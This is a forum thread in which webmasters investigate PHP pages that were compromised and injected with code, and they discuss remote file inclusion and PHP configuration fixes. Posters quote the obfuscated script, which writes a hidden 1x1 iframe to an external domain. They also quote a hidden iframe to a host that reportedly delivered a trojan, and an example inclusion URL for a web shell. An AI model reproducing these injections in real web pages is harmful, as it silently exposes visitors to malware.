Recently I've been discovering random bits of code in a friends PHP pages. He has brought it to my attention. It looks like someone is exploting the PHP page to write the PHP file itself. The PHP file normally looks like this:

Code:

<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html

?>

However, I've just taken a look - and it now looks like this:

Code:

<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html

<?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?>

The code seems pretty simple - and I never thought there could be any security holes with that. What could be causing the problem?

its trying to inject a cn file into an iframe

the file its pointing to is update.cn on your local machine or server

a cn file is a CNwin file extension but this could be different

I dont know how its being injected but the php would fail above and it will probably fail itsself as the php tags have been injected inside other php tags

It's NOT a "cn" file, it's a URL on a .cn domain opening in a 1px x 1px iframe. Whatever it is doing hiding an iframe on pages is rarely something you would be doing legitimately

Quote:

Originally Posted by chrishirst

It's NOT a "cn" file, it's a URL on a .cn domain opening in a 1px x 1px iframe. Whatever it is doing hiding an iframe on pages is rarely something you would be doing legitimately

Any Idea how it's being written into the file?

Is there any other PHP in the other pages? Using a CMS? Also a link to a website that is setup similar to this or the exact website it is from, would prove to be very useful.

Obviously it looks like you got RFI'd.

http://www.denglerdemolition.com/ is the website. What does RFI stand for?

Remote File Inclusion/Local File Inclusion
RFI/LFI
The given code isn't exploitable.
But it looks as if your contact page is exploitable.
I'm at work and don't have time to dedicate to this at the moment.
I'll be off in a little more than 3 hours and will get back to you with more details to see if my hypothesis is correct.

I take it you see/saw what I was talking about since you took everything down?

Your page has a virus and it's automatically downloading it onto our computers. I got a message from my virus security that a trojan was removed. You can take a look at http://en.wikipedia.org/wiki/Remote_File_Inclusion , hope that that will help.

This was the site that was included on homepage.html

http://u1m.ru:8080/index.php

I'm afraid the page may have been hit with another exploit. So the above piece of code is fool proof? If the problem is with the contact page, how is it that only the index page is being messed with?

It has to be a problem with your host. Because a program is adding the code to your site. When I visited homepage.html the trojan was downloaded. At the bottom of your source code on that page it has the iframe inclusion

<iframe src="http://u1m.ru:8080/index.php" width=151 height=128 style="visibility: hidden"></iframe>

konetch, what did you use to get rid of it?

Nothing, it is still there, go to http://www.denglerdemolition.com/homepage.html . Make sure you have a virus scanner otherwise you'll get infected.

It's on the bottom of the page's source code

Seriously, how is this getting in there? The host (me) really doesn't see any problems.

It's probably a PHP configuration problem. Here's what I found

Quote:

RFI attacks are possible because of several PHP configuration flags:

• One is called register_globals. register_global automatically defines variables in the script that are entered in the page URL. In this example, the $page variable will automatically be filled with http://malicious.code.com/C99.txt?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
• Another one, even more relevant to this attack, is allow_url_fopen. This defines if PHP should be able to fetch remote content in almost any function that takes a file name as a parameter. In PHP 5.2 this setting was separated for the include() family of functions and called allow_url_include. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software.

You'll have to change the php configuration on your host

I've disabled both, let's see if that was the cause of the problem

You'll need to delete the iframe at the bottom of your source code, in homepage.html for it to go away. It shouldn't come back after that. Plus you'll need to correct the code on your index page from

PHP Code:

<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html


?>

to

PHP Code:

<?php

$title = 'test';

include('overall_header.html');

include('homepage.html');

include('overall_footer.html');


?>

It will get rid of the parse errors.


Edit: You'll also need to get rid of this

PHP Code:

<?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?>

on your index.php file

Oh, that's just an error on my part - good eye tho . I'll try that, thanks

Your welcome. Good luck!

I have found 3 of my sites have been infected with this. They all where modified 7/10/2009 at 9:54am. The only common code in each one is <script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>' above this is diffrent for each one. atleast I have the original information on my machine. I've had to delete the index page from the web and replace it with an old uninfected copy. This has been the only way I've been able to get completely get rid of it.